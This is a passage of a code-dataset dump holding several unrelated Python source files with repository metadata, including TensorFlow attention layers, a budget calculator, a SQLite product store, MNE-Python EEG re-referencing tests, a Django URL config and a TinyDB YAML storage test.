tf.get_variable(\"diagonal_params\", [att_dim], dtype=tf.float32)\n atten_value_1 = atten_value_1 * tf.expand_dims(diagnoal_params, axis=0)\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n\n if remove_diagnoal:\n diagnoal = tf.ones([len_1], tf.float32) # [len1]\n diagnoal = 1.0 - tf.diag(diagnoal) # [len1, len1]\n diagnoal = tf.expand_dims(diagnoal, axis=0) # ['x', len1, len1]\n atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n # normalize\n # atten_value = tf.nn.softmax(atten_value, name='atten_value') # [batch_size, len_1, len_2]\n atten_value = softmax_with_mask(atten_value, tf.expand_dims(mask2, axis=1))\n if remove_diagnoal: atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n\n return atten_value\n\ndef fusion_attention_amit(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=250, remove_diagnoal=False, mask1=None, mask2=None, is_training=False, dropout_rate=0.2):\n# def fusion_attention_amit(scope_name, in_q_rep, in_p_rep, w_dim1, w_dim2,\n# reuse=False, is_training=None, options=None, remove_diagnoal=False):\n input_shape = tf.shape(in_value_2)\n batch_size = input_shape[0]\n question_len = input_shape[1]\n passage_len = tf.shape(in_value_1)[1]\n with tf.variable_scope(scope_name, reuse=False):\n q_rep = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n p_rep = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n\n w_wordlevel = tf.get_variable(\"famf_highlevel_{}\".format(scope_name), [feature_dim1, att_dim],\n dtype=tf.float32) # D1 x D2\n 
q_rep = tf.reshape(q_rep, [-1, feature_dim1], name='BQ_dim1') # [B * Q, D1]\n\n q_rep = tf.matmul(q_rep, w_wordlevel) # [B * Q, D2]\n q_rep = tf.nn.relu(q_rep) # [B * Q, D2]\n\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim],\n dtype=tf.float32) # D1 x D2\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # D2 x D2\n q_rep = tf.matmul(q_rep, D) # f(Ux) D # [B * Q, D2]\n\n q_rep = tf.reshape(q_rep, [batch_size, question_len, att_dim],name='B_Q_dim2') # [B, Q, D2]\n\n\n p_rep = tf.reshape(p_rep, [-1, feature_dim1],name='BP_dim1') # [B * P, D1]\n p_rep = tf.matmul(p_rep, w_wordlevel) # [B * P, D2]\n p_rep = tf.nn.relu(p_rep) # f(Uy) # [B * P, D2]\n p_rep = tf.reshape(p_rep, [batch_size, passage_len,att_dim],name='B_P_dim2') # [B, P, D2]\n\n # passage: B x P x D2\n # question: B x Q x D2\n shuffled = tf.transpose(q_rep, perm=[0, 2, 1]) # B x D2 x Q\n\n # similarity between passage and query\n S_q_p = tf.matmul(p_rep, shuffled) # B x P x Q\n\n alphas = tf.nn.softmax(S_q_p) # B x P x Q\n return alphas\n\n # expanded_alphas = tf.expand_dims(alphas, axis=-1) # [ B , P , Q , 'x']\n # weighted_query = tf.expand_dims(query_rep, axis=1) # [B, 'x', Q, D1]\n # weighted_query = tf.reduce_sum(tf.multiply(weighted_query, expanded_alphas), axis=2) # [B, P, D1]\n # return weighted_query\n\n\ndef weighted_sum(atten_scores, in_values):\n '''\n\n :param atten_scores: # [batch_size, len1, len2]\n :param in_values: [batch_size, len2, dim]\n :return:\n '''\n return tf.matmul(atten_scores, in_values)\n\ndef cal_relevancy_matrix(in_question_repres, in_passage_repres):\n in_question_repres_tmp = tf.expand_dims(in_question_repres, 1) # [batch_size, 1, question_len, dim]\n in_passage_repres_tmp = tf.expand_dims(in_passage_repres, 2) # [batch_size, passage_len, 1, dim]\n relevancy_matrix = cosine_distance(in_question_repres_tmp,in_passage_repres_tmp) # [batch_size, passage_len, question_len]\n return relevancy_matrix\n\ndef mask_relevancy_matrix(relevancy_matrix, question_mask, passage_mask):\n # relevancy_matrix: [batch_size, passage_len, question_len]\n # question_mask: [batch_size, question_len]\n # passage_mask: [batch_size, passsage_len]\n if question_mask is not None:\n relevancy_matrix = tf.multiply(relevancy_matrix, tf.expand_dims(question_mask, 1))\n relevancy_matrix = tf.multiply(relevancy_matrix, tf.expand_dims(passage_mask, 2))\n return relevancy_matrix\n\ndef compute_gradients(tensor, var_list):\n grads = tf.gradients(tensor, var_list)\n return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)]\n","repo_name":"freesunshine0316/MHQA","sub_path":"src/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":21533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72138007414","text":"from db import BudgetRepo\nimport datetime\nimport calendar\n\nclass Status:\n Create = \"Create Success\"\n Update = \"Update Success\"\n MonthErr = \"Error: Month should be between 1~12\"\n AmountIsNegative = \"Error: Amount should not be negative value\"\n\nclass Budget_Manager:\n\n def __init__(self):\n self.db = BudgetRepo()\n\n\n def Add_budget(self, Date, Amount):\n if int(Date[-2:]) > 12 or int(Date[-2:]) < 1:\n return Status.MonthErr\n if int(Amount) < 0:\n return Status.AmountIsNegative\n\n if self.db.is_budget_exists(Date) is True:\n self.db.replace_budget(Date, Amount)\n return Status.Update\n else:\n self.db.insert_budget(Date, Amount)\n return 
Status.Create\n\n def totalAmount(self, Start: datetime.datetime, End: datetime.datetime):\n BudgetDict = self.db.Get_All()\n\n total_amount = 0.00\n\n if not BudgetDict:\n return total_amount\n\n\n\n budget_per_day_dict = {}\n\n for year_month in BudgetDict:\n month_budget = BudgetDict[year_month]\n year_month = str(year_month)\n year = int(year_month[0: 4])\n month = int(year_month[4:])\n days_of_month = calendar.monthrange(year, month)[1]\n\n budget_per_day = month_budget / days_of_month\n budget_per_day_dict[year_month] = budget_per_day\n\n for dt in daterange(Start, End):\n year_month = dt.strftime('%Y%m')\n if year_month not in budget_per_day_dict:\n continue\n total_amount += budget_per_day_dict[year_month]\n\n return total_amount\n\n\ndef daterange(date1, date2):\n for n in range(int((date2 - date1).days)+1):\n yield date1 + datetime.timedelta(n)","repo_name":"cynthiaszchen/BudgetAdding","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16466351105","text":"import sqlite3\n\nclass Veri_Tabani(): # Class that wraps the product database.\n def __init__(self):\n\n self.baglanti_olustur() # Call the connection-setup method.\n\n\n\n def baglanti_olustur(self): # Creates the database and the table.\n self.baglanti=sqlite3.connect(\"Urun_Bilgileri.db\") # Create a database named Urun_Bilgileri (product info).\n self.cursor=self.baglanti.cursor() # Define the cursor.\n self.cursor.execute(\"CREATE TABLE IF NOT EXISTS Bilgiler( AD TEXT, URETİM TEXT, STT TEXT, GRAMAJ INT)\")# Create the table\n self.baglanti.commit()# Commit the table to the database.\n\n def baglanti_kes(self): # Closes the connection to the database.\n self.baglanti.close()\n\n def urun_gir(self): # Function for adding a product to the database.\n self.ad=input(\"Enter the product name=\")\n self.uretim_tarihi=input(\"Enter the production date=\")\n self.stt=input(\"Enter the expiration date=\")\n self.gram=int(input(\"Enter the weight in grams=\"))\n\n self.cursor.execute(\"INSERT INTO Bilgiler VALUES(?,?,?,?)\",(self.ad,self.uretim_tarihi,self.stt,self.gram))\n self.baglanti.commit()# Run the query against the db.\n\n def tum_urunleri_goster(self): # Shows which products are in the database.\n self.cursor.execute(\"SELECT * FROM Bilgiler\")\n liste=self.cursor.fetchall()\n print(liste)\n\n def urun_sil(self): # Deletes the requested product entirely, i.e. removes all information about it.\n self.isim=input(\"Enter the name of the product to delete from the database=\")\n self.cursor.execute(\"DELETE FROM Bilgiler where AD=?\",(self.isim,))# The trailing comma is needed because the parameters are passed as a tuple.(?)\n self.baglanti.commit()\n\n\n def urun_guncelle(self):# Function for updating a product.\n self.cursor.execute(\"SELECT * FROM Bilgiler\")\n liste=self.cursor.fetchall()\n for i in liste:\n a=i[0]\n b=i[1]\n c=i[2]# Grab the fields of the record to update.\n d=i[3]\n\n\n print(\"Which field of the product do you want to update?\")\n print(\"1-Name=\\n 2-Production Date=\\n 3-Expiration Date=\\n 4-Weight=\")\n islem=input(\"Choose an option=\")\n if(islem==\"1\"):\n self.a = input(\"Enter the name of the product to update=\")\n self.yeni_ad = input(\"Enter the new product name=\")\n self.cursor.execute(\"UPDATE Bilgiler SET AD=? 
WHERE AD=?\", (self.yeni_ad, self.a))\n self.baglanti.commit()\n\n\n elif(islem==\"2\"):\n self.b = input(\"Guncellemek istediginiz urun uretim tarihini giriniz=\")\n self.yeni_tarih = input(\"Yeni ürün URETİM TARİHİNİ giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET URETİM=? WHERE URETİM=?\", (self.yeni_tarih, self.b))\n self.baglanti.commit()\n\n elif(islem==\"3\"):\n self.c = input(\"Guncellemek istediginiz urunun STT giriniz=\")\n self.yeni_stt= input(\"Yeni ürün STT giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET STT=? WHERE STT=?\", (self.yeni_stt, self.c))\n self.baglanti.commit()\n\n elif(islem==\"4\"):\n self.d = input(\"Guncellemek istediginiz urun gramajini giriniz=\")\n self.yeni_gram = input(\"Yeni ürün GRAMİNİ giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET GRAMAJ=? WHERE GRAMAJ=?\", (self.yeni_gram, self.d))\n self.baglanti.commit()\n\n\nobje=Veri_Tabani() #Veri_Tabani adli calss'imdan obje adinda bi obje olusutrdum ve bu objemin methodlarini diger yerde kulanabilmke icin.\n\n","repo_name":"tiskayaozgur/Market-Data-Storage","sub_path":"Classlar.py","file_name":"Classlar.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73034924533","text":"# Authors: Marijn van Vliet \n# Alexandre Gramfort \n# Teon Brooks \n#\n# License: BSD (3-clause)\n\nimport warnings\nimport os.path as op\nimport numpy as np\n\nfrom nose.tools import assert_true, assert_equal, assert_raises\nfrom numpy.testing import assert_array_equal, assert_allclose\n\nfrom mne import (pick_channels, pick_types, Epochs, read_events,\n set_eeg_reference, set_bipolar_reference,\n add_reference_channels)\nfrom mne.epochs import BaseEpochs\nfrom mne.io import read_raw_fif\nfrom mne.io.constants import FIFF\nfrom mne.io.proj import _has_eeg_average_ref_proj, Projection\nfrom mne.io.reference import _apply_reference\nfrom mne.datasets import testing\nfrom mne.utils import run_tests_if_main\n\nwarnings.simplefilter('always') # enable b/c these tests throw warnings\n\ndata_dir = op.join(testing.data_path(download=False), 'MEG', 'sample')\nfif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif')\neve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif')\nave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif')\n\n\ndef _test_reference(raw, reref, ref_data, ref_from):\n \"\"\"Test whether a reference has been correctly applied.\"\"\"\n # Separate EEG channels from other channel types\n picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')\n picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True,\n stim=True, exclude='bads')\n\n # Calculate indices of reference channesl\n picks_ref = [raw.ch_names.index(ch) for ch in ref_from]\n\n # Get data\n _data = raw._data\n _reref = reref._data\n\n # Check that the ref has been properly computed\n if ref_data is not None:\n assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2))\n\n # Get the raw EEG data and other channel data\n raw_eeg_data = _data[..., picks_eeg, :]\n raw_other_data = _data[..., picks_other, :]\n\n # Get the rereferenced EEG data\n reref_eeg_data = _reref[..., picks_eeg, :]\n reref_other_data = _reref[..., picks_other, :]\n\n # Check that non-EEG channels are untouched\n assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15)\n\n # Undo rereferencing of EEG channels if possible\n if ref_data is not None:\n if isinstance(raw, BaseEpochs):\n unref_eeg_data = reref_eeg_data + 
ref_data[:, np.newaxis, :]\n else:\n unref_eeg_data = reref_eeg_data + ref_data\n assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15)\n\n\n@testing.requires_testing_data\ndef test_apply_reference():\n \"\"\"Test base function for rereferencing.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = _apply_reference(\n raw.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # The CAR reference projection should have been removed by the function\n assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))\n\n # Test that disabling the reference does not break anything\n reref, ref_data = _apply_reference(raw, [])\n assert_array_equal(raw._data, reref._data)\n\n # Test that data is modified in place when copy=False\n reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'])\n assert_true(raw is reref)\n\n # Test re-referencing Epochs object\n raw = read_raw_fif(fif_fname, preload=False)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n reref, ref_data = _apply_reference(\n epochs.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test re-referencing Evoked object\n evoked = epochs.average()\n reref, ref_data = _apply_reference(\n evoked.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Referencing needs data to be preloaded\n raw_np = read_raw_fif(fif_fname, preload=False)\n assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001'])\n\n # Test having inactive SSP projections that deal with channels involved\n # during re-referencing\n raw = read_raw_fif(fif_fname, preload=True)\n raw.add_proj(\n Projection(\n active=False,\n data=dict(\n col_names=['EEG 001', 'EEG 002'],\n row_names=None,\n data=[[1, 1]],\n ncol=2,\n nrow=1\n ),\n desc='test',\n kind=1,\n )\n )\n # Projection concerns channels mentioned in projector\n assert_raises(RuntimeError, _apply_reference, raw, ['EEG 001'])\n\n # Projection does not concern channels mentioned in projector, no error\n _apply_reference(raw, ['EEG 003'], ['EEG 004'])\n\n\n@testing.requires_testing_data\ndef test_set_eeg_reference():\n \"\"\"Test rereference eeg data.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n raw.info['projs'] = []\n\n # Test setting an average reference\n assert_true(not _has_eeg_average_ref_proj(raw.info['projs']))\n reref, ref_data = set_eeg_reference(raw)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_true(not reref.info['projs'][0]['active'])\n assert_true(ref_data is None)\n reref.apply_proj()\n eeg_chans = [raw.ch_names[ch]\n for ch in pick_types(raw.info, meg=False, eeg=True)]\n _test_reference(raw, reref, ref_data,\n [ch for ch in eeg_chans if ch not in raw.info['bads']])\n\n # Test setting an average reference when one was already present\n with warnings.catch_warnings(record=True):\n reref, ref_data = set_eeg_reference(raw, copy=False)\n assert_true(ref_data is None)\n\n # Test setting an average reference on non-preloaded data\n raw_nopreload = read_raw_fif(fif_fname, preload=False)\n raw_nopreload.info['projs'] = []\n 
reref, ref_data = set_eeg_reference(raw_nopreload)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_true(not reref.info['projs'][0]['active'])\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test that data is modified in place when copy=False\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'],\n copy=False)\n assert_true(raw is reref)\n\n # Test moving from custom to average reference\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'])\n reref, _ = set_eeg_reference(reref)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_equal(reref.info['custom_ref_applied'], False)\n\n # When creating an average reference fails, make sure the\n # custom_ref_applied flag remains untouched.\n reref = raw.copy()\n reref.info['custom_ref_applied'] = True\n reref.pick_types(eeg=False) # Cause making average ref fail\n assert_raises(ValueError, set_eeg_reference, reref)\n assert_true(reref.info['custom_ref_applied'])\n\n # Test moving from average to custom reference\n reref, ref_data = set_eeg_reference(raw)\n reref, _ = set_eeg_reference(reref, ['EEG 001', 'EEG 002'])\n assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))\n assert_equal(reref.info['custom_ref_applied'], True)\n\n\n@testing.requires_testing_data\ndef test_set_bipolar_reference():\n \"\"\"Test bipolar referencing.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n raw.apply_proj()\n\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar',\n {'kind': FIFF.FIFFV_EOG_CH,\n 'extra': 'some extra value'})\n assert_true(reref.info['custom_ref_applied'])\n\n # Compare result to a manual calculation\n a = raw.copy().pick_channels(['EEG 001', 'EEG 002'])\n a = a._data[0, :] - a._data[1, :]\n b = reref.copy().pick_channels(['bipolar'])._data[0, :]\n assert_allclose(a, b)\n\n # Original channels should be replaced by a virtual one\n assert_true('EEG 001' not in reref.ch_names)\n assert_true('EEG 002' not in reref.ch_names)\n assert_true('bipolar' in reref.ch_names)\n\n # Check channel information\n bp_info = reref.info['chs'][reref.ch_names.index('bipolar')]\n an_info = reref.info['chs'][raw.ch_names.index('EEG 001')]\n for key in bp_info:\n if key == 'loc':\n assert_array_equal(bp_info[key], 0)\n elif key == 'coil_type':\n assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR)\n elif key == 'kind':\n assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH)\n else:\n assert_equal(bp_info[key], an_info[key])\n assert_equal(bp_info['extra'], 'some extra value')\n\n # Minimalist call\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002')\n assert_true('EEG 001-EEG 002' in reref.ch_names)\n\n # Set multiple references at once\n reref = set_bipolar_reference(\n raw,\n ['EEG 001', 'EEG 003'],\n ['EEG 002', 'EEG 004'],\n ['bipolar1', 'bipolar2'],\n [{'kind': FIFF.FIFFV_EOG_CH, 'extra': 'some extra value'},\n {'kind': FIFF.FIFFV_EOG_CH, 'extra': 'some extra value'}],\n )\n a = raw.copy().pick_channels(['EEG 001', 'EEG 002', 'EEG 003', 'EEG 004'])\n a = np.array([a._data[0, :] - a._data[1, :],\n a._data[2, :] - a._data[3, :]])\n b = reref.copy().pick_channels(['bipolar1', 'bipolar2'])._data\n assert_allclose(a, b)\n\n # Test creating a bipolar reference that doesn't involve EEG channels:\n # it should not set the custom_ref_applied flag\n reref = 
set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112',\n ch_info={'kind': FIFF.FIFFV_MEG_CH})\n assert_true(not reref.info['custom_ref_applied'])\n assert_true('MEG 0111-MEG 0112' in reref.ch_names)\n\n # Test a battery of invalid inputs\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n ['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2'])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', 'bipolar',\n ch_info=[{'foo': 'bar'}, {'foo': 'bar'}])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ch_name='EEG 003')\n\n\ndef _check_channel_names(inst, ref_names):\n \"\"\"Check channel names.\"\"\"\n if isinstance(ref_names, str):\n ref_names = [ref_names]\n\n # Test that the names of the reference channels are present in `ch_names`\n ref_idx = pick_channels(inst.info['ch_names'], ref_names)\n assert_true(len(ref_idx), len(ref_names))\n\n # Test that the names of the reference channels are present in the `chs`\n # list\n inst.info._check_consistency() # Should raise no exceptions\n\n\n@testing.requires_testing_data\ndef test_add_reference():\n \"\"\"Test adding a reference.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # check if channel already exists\n assert_raises(ValueError, add_reference_channels,\n raw, raw.info['ch_names'][0])\n # add reference channel to Raw\n raw_ref = add_reference_channels(raw, 'Ref', copy=True)\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n _check_channel_names(raw_ref, 'Ref')\n\n orig_nchan = raw.info['nchan']\n raw = add_reference_channels(raw, 'Ref', copy=False)\n assert_array_equal(raw._data, raw_ref._data)\n assert_equal(raw.info['nchan'], orig_nchan + 1)\n _check_channel_names(raw, 'Ref')\n\n # for Neuromag fif's, the reference electrode location is placed in\n # elements [3:6] of each \"data\" electrode location\n assert_allclose(raw.info['chs'][-1]['loc'][:3],\n raw.info['chs'][picks_eeg[0]]['loc'][3:6], 1e-6)\n\n ref_idx = raw.ch_names.index('Ref')\n ref_data, _ = raw[ref_idx]\n assert_array_equal(ref_data, 0)\n\n # add reference channel to Raw when no digitization points exist\n raw = read_raw_fif(fif_fname).crop(0, 1).load_data()\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n del raw.info['dig']\n\n raw_ref = add_reference_channels(raw, 'Ref', copy=True)\n\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n _check_channel_names(raw_ref, 'Ref')\n\n orig_nchan = raw.info['nchan']\n raw = add_reference_channels(raw, 'Ref', copy=False)\n assert_array_equal(raw._data, raw_ref._data)\n assert_equal(raw.info['nchan'], orig_nchan + 1)\n _check_channel_names(raw, 'Ref')\n\n # Test adding an existing channel as reference channel\n assert_raises(ValueError, add_reference_channels, raw,\n raw.info['ch_names'][0])\n\n # add two reference channels to Raw\n raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True)\n _check_channel_names(raw_ref, ['M1', 'M2'])\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n assert_array_equal(raw_ref._data[-2:, :], 0)\n\n raw = 
add_reference_channels(raw, ['M1', 'M2'], copy=False)\n _check_channel_names(raw, ['M1', 'M2'])\n ref_idx = raw.ch_names.index('M1')\n ref_idy = raw.ch_names.index('M2')\n ref_data, _ = raw[[ref_idx, ref_idy]]\n assert_array_equal(ref_data, 0)\n\n # add reference channel to epochs\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n # default: proj=True, after which adding a Ref channel is prohibited\n assert_raises(RuntimeError, add_reference_channels, epochs, 'Ref')\n\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n epochs_ref = add_reference_channels(epochs, 'Ref', copy=True)\n\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1)\n _check_channel_names(epochs_ref, 'Ref')\n ref_idx = epochs_ref.ch_names.index('Ref')\n ref_data = epochs_ref.get_data()[:, ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add two reference channels to epochs\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n with warnings.catch_warnings(record=True): # multiple set zero\n epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True)\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2)\n _check_channel_names(epochs_ref, ['M1', 'M2'])\n ref_idx = epochs_ref.ch_names.index('M1')\n ref_idy = epochs_ref.ch_names.index('M2')\n assert_equal(epochs_ref.info['chs'][ref_idx]['ch_name'], 'M1')\n assert_equal(epochs_ref.info['chs'][ref_idy]['ch_name'], 'M2')\n ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add reference channel to evoked\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n evoked = epochs.average()\n evoked_ref = add_reference_channels(evoked, 'Ref', copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1)\n _check_channel_names(evoked_ref, 'Ref')\n ref_idx = evoked_ref.ch_names.index('Ref')\n ref_data = evoked_ref.data[ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # add two reference channels to evoked\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, 
event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n evoked = epochs.average()\n with warnings.catch_warnings(record=True): # multiple set zero\n evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2)\n _check_channel_names(evoked_ref, ['M1', 'M2'])\n ref_idx = evoked_ref.ch_names.index('M1')\n ref_idy = evoked_ref.ch_names.index('M2')\n ref_data = evoked_ref.data[[ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # Test invalid inputs\n raw_np = read_raw_fif(fif_fname, preload=False)\n assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref'])\n assert_raises(ValueError, add_reference_channels, raw, 1)\n\nrun_tests_if_main()\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mne-tools_mne-python/mne-python-master/mne/io/tests/test_reference.py","file_name":"test_reference.py","file_ext":"py","file_size_in_byte":18744,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"10219565949","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', include('base.urls')),\n path('auth/', include('users.urls')),\n path('meetings/', include('meetings.urls')),\n path('newsletters/', include('news.urls')),\n path('library/', include('library.urls')),\n path('admin/', admin.site.urls),\n path('summernote/', include('django_summernote.urls')),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","repo_name":"sirthom9123/Church-Manager","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11272577200","text":"import numpy as np\n\ndef get_word_indices(word_list, index):\n common_indices = []\n new_word_list = []\n for word in word_list:\n try:\n common_indices.append(index[word])\n new_word_list.append(word)\n except KeyError:\n print(\"Unmapped word!\")\n return new_word_list, np.array(common_indices)","repo_name":"agonzalezreyes/coha-cooccur","sub_path":"src/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10072581574","text":"import tempfile\n\nfrom tinydb import Query\nfrom tinydb import TinyDB\n\nfrom flask_tinydb.storages import YAMLStorage\n\n\ndef test_yaml_storage():\n path = tempfile.mkstemp()[1]\n\n storage = YAMLStorage\n\n # Create a TinyDB instance\n db = TinyDB(path, storage=storage)\n\n name = Query()\n\n db.insert({\"name\": \"John Doe\"})\n assert db.all() == [{\"name\": \"John Doe\"}]\n\n db.insert({\"name\": \"Another John Doe\"})\n assert db.all() == [{\"name\": \"John Doe\"}, {\"name\": \"Another John Doe\"}]\n\n db.update({\"name\": \"John Doe II\"}, name.name == \"John Doe\")\n assert db.all() == 